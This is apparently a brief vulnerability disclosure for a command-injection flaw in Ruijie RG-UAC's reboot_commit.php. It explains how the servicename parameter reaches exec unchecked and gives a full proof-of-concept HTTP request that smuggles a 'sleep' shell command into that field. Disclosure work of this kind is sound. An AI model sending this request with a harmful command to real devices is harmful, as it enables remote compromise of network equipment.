Ruijie Network is a professional network manufacturer with a full range of network equipment products and solutions including switches, routers, software, security firewalls, wireless products, storage, etc.
There is a command execution vulnerability in Ruijie RG-UAC. Attackers exploit vulnerabilities to compromise servers.
official:https://www.ruijie.com.cn
version:1.0
/view/systemConfig/reboot/reboot_commit.php
The key code is marked, the variable $rebootmode is not equal to 1, and $servicename is controllable, directly substituted into exec, resulting in rce vulnerability.
Login background, construct poc, successfully verify rce vulnerability
poc: POST /view/systemConfig/reboot/reboot_commit.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=f8a12a507141292b1dabce52b88335da Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 45
rebootmode=222&servicename==sleep${IFS}10
;1
![图片](https://private-user-images.githubusercontent.com/171104034/338469609-a6ace9ed-dead-4531-8e8d-7252c83e9bd6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA4MTUwODAsIm5iZiI6MTcyMDgxNDc4MCwicGF0aCI6Ii8xNzExMDQwMzQvMzM4NDY5NjA5LWE2YWNlOWVkLWRlYWQtNDUzMS04ZThkLTcyNTJjODNlOWJkNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzEyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcxMlQyMDA2MjBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zYzJkZGNiNmFlOWE5NGY2ZTdhNDAxMThhNGEzNjNjMTcxMTVlMjIxMDdhYmI0ZWY4YWZmMDVhNzY0NDIyZjU4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.SMGoX4Cs-6Ddu9dZF18RYhVIX9QxeGva0p0y_UH6O9A)